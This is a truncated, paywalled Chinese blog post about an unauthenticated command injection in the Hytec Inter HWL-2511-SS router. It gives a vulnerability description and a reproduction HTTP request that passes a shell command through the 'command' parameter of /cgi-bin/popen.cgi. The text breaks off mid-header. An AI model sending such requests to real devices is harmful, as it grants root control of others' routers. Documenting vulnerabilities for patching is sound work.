超级会员免费看
本文详细介绍了Hytec Inter HWL-2511-SS路由器中存在的命令注入漏洞,该漏洞允许未认证的攻击者执行任意命令并获取root权限,严重影响设备安全。内容包括漏洞描述、复现过程、POC验证方法以及修复建议。
0x01漏洞描述
Hytec Inter HWL-2511-SS 设备中存在一项严重的命令注入漏洞。这个漏洞可能被未经身份验证的攻击者利用,通过注入恶意命令来执行未经授权的操作。成功利用该漏洞将使攻击者获得 root 权限,从而在底层操作系统上执行任意命令,可能导致系统被完全控制
0x02漏洞复现
GET /cgi-bin/popen.cgi?command=id HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
If-Modified-Since: Thu, 19 Aug 2021 19:55:52 GMT
If-None-Mat
订阅专栏 解锁全文
668
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
